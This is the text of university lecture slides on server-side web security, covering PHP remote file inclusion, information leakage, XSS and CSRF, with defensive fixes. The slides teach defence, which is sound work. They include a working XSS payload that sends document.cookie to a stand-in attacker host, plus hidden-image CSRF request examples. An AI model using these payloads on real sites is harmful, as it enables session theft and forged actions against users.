Download Web Security

Survey
yes no Was this document useful for you?
   Thank you for your participation!

* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project

Document related concepts

URL redirection wikipedia , lookup

Transcript
Cosc 4765
Server side Web security
Web security issues
From Cenzic Vulnerability report 2014
https://info.cenzic.com/2013-Application-Security-Trends-Report.html
• SQL Injections
• Discussed in another lecture
• Web Server Configuration and Web server
versions
– Poorly configured systems.
• Allowing PHP remote file include
– Version allows attackers to look the version to
find a vulnerably in the web server.
PHP Remote File Include
• By default, PHP allows file functions to
access resources on the Internet using a
feature called "allow_url_fopen".
• When PHP scripts allow user input to
influence file names, remote file inclusion
can be the result.
PHP Remote File Include
• This attack allows (but is not limited to):
• Remote code execution
• Remote root kit installation
• On Windows, complete system compromise may
be possible through the use of PHP’s SMB file
wrappers
• Fixes:
– Input validation and sanitizing
– Config allow_url_fopen off
• will break apps that rely on this feature, but protect
against a very active exploit vector.
• Authentication and Authorization errors
– Generally the ability to avoid a required login
screen
• Or hack another login normally via XSS or CRSF
• Information leakage.
– Data is displayed that is not necessary.
• Example UW used to show your SSN on every page of
wyoweb.
– Or displayed on “not protected” pages.
• Email address, phone number, etc.
• Why is this important?
XSS
• Works by the trust a user has for the site.
– Broadly defined as tricking web pages into
displaying web surfer supplied data capable
of altering the page for the viewer.
• Most dynamic web pages change to
display info for a user, but XSS changes
the pages to get information from the
viewer, normally cookies and other data.
Some necessary knowledge
• A basic understanding of URL structure
• An understanding of html, JavaScript
• Some understanding of html encoding,
http request methods
• web application technologies like ASP,
php, etc.
What can XSS do?
• Cookie theft and Account Hijacking
– Since XSS executes arbitrary web code on the clients
browser.
– Many cookie for older web applications hold all the
information needed to login to an account
(“Remember this computer”)
• verification info on the client side, state, and/or credentials
– Allows for Identity theft, accessing confidential
resources, pay content, even denial of account
services.
What can XSS do? (2)
• User Tracking / Statistics
– Able to gain information on sites user’s
– Able to monitor their clicks through the
vulnerable site.
– Maybe able link users email address to clicks
and interests
• good for spammers!
What can XSS do? (3)
• Browser / User exploitation
– Possible Examples
• Use the credentials of a site to do what I want
– Like using Microsoft site.
– If there is a XSS hole in their site to run my malware.
» Many people would press OK to run code from microsoft.
• High distribution rate and target audience
• Don’t exploit the site, just steal the users from the site and
redirect them to another.
• Force users into actions onto another site on my behalf but
remove me from the evidence.
What can XSS do? (4)
• Misinformation
– dissemination of disinformation
• Since we can possibly rewrite content on web
pages
– And of course… SPAM and scams.
How to avoid XSS
• Most of it is avoidable, just like SQL
injection and buffer overflow.
– but like these, it’s sometimes easier to miss
– especially on large and complex web sites.
– One big one:
– Turn off error messages on productions web sites.
• How?
– Just like Buffer Overflow and SQL injection
– Proper filtering on ALL user input data.
Example
• Typical script called welcome.cgi
– GET /welcome.cgi?name=Joe%20Hacker
HTTP/1.0
– Host: www.vulnerable.site
• Response
– <html> <title>Welcome!</title>
– Hi Joe Hacker
– <BR> Welcome to our system…
– </html>
Example abused
• http://www.vulnerable.site/welcome.cgi?na
me=<script>alert(document.cookie)</scipt
>
• Since the link is clicked on the response
is:
– <HTML> <Title>Welcome!</Title>
– Hi <script>alert(document.cookie)</script>
– <BR> Welcome to our system ...
– </HTML>
Which is executed by the browser
Example abused (2)
• Better example:
– http://www.vulnerable.site/welcome.cgi?name=<script
>window.open(“http://www.attacker.site/collect.cgi?co
okie=”%2Bdocument.cookie)</script>
• Returns to user
– <script>window.open(“http://www.attacker.site/collect.
cgi?cookie=”+document.cookie)</script>
• Open a webpage that gets the cookie info about
the vulnerable website.
Preventing XSS
• Don’t just filter dangerous characters
• Filter out everything that is not necessary
• Make sure there is one central function to
sanitize everything.
– So when it is added to, everything gets it.
Filter Examples
• Perl
– Allow A through Z any case, Zero through
Nine, period and dash. Remove everything
else.
– $var =~ s/[^a-z0-9 \-.]//ig;
Filter Examples (2)
• PHP
– Use stripe_tags or htmlentities functions
• echo htmlentities($name);
– Or use substitition again.
• echo preg_replace(‘/[^a-z0-9 .\-]/i,'',$name);
Demo
• In class Demo of how XSS works
Filter output data
• Not the html, but the data.
• similar to filtering input except that you
filter characters that are written out to the
client
– May cause problems with output for dynamic
web pages.
• example, <table> would be writing as table
Possible Sources of Malicious
Data
•
•
•
•
Query String
Cookies
Posted data
URLs and pieces of URLs, such as
PATH_INFO
• Data retrieved from users that is persisted
in some fashion such as in a database
Cross-site request forgeries
(CSRF)
• Works by exploiting the trust that a site
has for the user.
– Works by specific urls allowing specific
actions to be performed when requested
– Same idea as one-click purchase
• http://site/stocks?buy=100&stock=ebay
– Task performed by the user who already
logged into the site.
• The browser makes the request, without the user
knowledge.
• Can be done with XXS.
Example CSRF
• HTML Methods
– IMG SRC
<img src="http://host/?command">
– SCRIPT SRC
<script src="http://host/?command">
– IFRAME SRC
<iframe src="http://host/?command">
• JavaScript Methods
<script>
var foo = new Image();
foo.src = "http://host/?command";
</script>
• Example code:
– <img src="http://example.com/add_to_db.php?
name=cheap%20rolex&[email protected]&comment=mort
gage%20help&optin=yes" width="1" height="1">
Major hacks with CSRF
• A vulnerability in GMail was discovered in
January 2007 which allowed a attacker to
steal a GMail user's contact list.
• A different issue was discovered in Netflix
which allowed an attacker to change the
name and address on the account, as well
as add movies to the rental queue etc...
Fixes for CSRF
• A user should always have to login.
– No “Remember ME” or something of that sort,
which is based on a cookie logoin.
– Short session periods (maybe 5 minutes) can
also reduce the odds of successful attacks.
• Adding a session token to each request
– But XXS can get around this by sniffing the
session token.
Tools
• The list is older, maybe still useful
– http://projects.webappsec.org/w/page/132469
88/Web%20Application%20Security%20Scan
ner%20List
– From
http://samate.nist.gov/index.php/Web_Application_Vulner
ability_Scanners.html#Web_Applications_Issues
• Source code scanners
– http://samate.nist.gov/index.php/Source_Cod
e_Security_Analyzers.html
References
• http://coding.smashingmagazine.com/2010/01/14/w
eb-security-primer-are-you-part-of-the-problem/
• http://www.cert.org/advisories/CA-2000-02.html
• HOWTO: Prevent Cross-Site Scripting Security
Issues
http://www.megasecurity.org/Info/CSS_prevent.html
• Cross Site Scripting Scanning ("XSSS")
http://www.sven.de/xsss/
• http://en.wikipedia.org/wiki/Cross_site_scripting
• http://ha.ckers.org/xss.html
• http://www.sans.org/
• http://www.cgisecurity.com/articles/csrf-faq.shtml
Q&A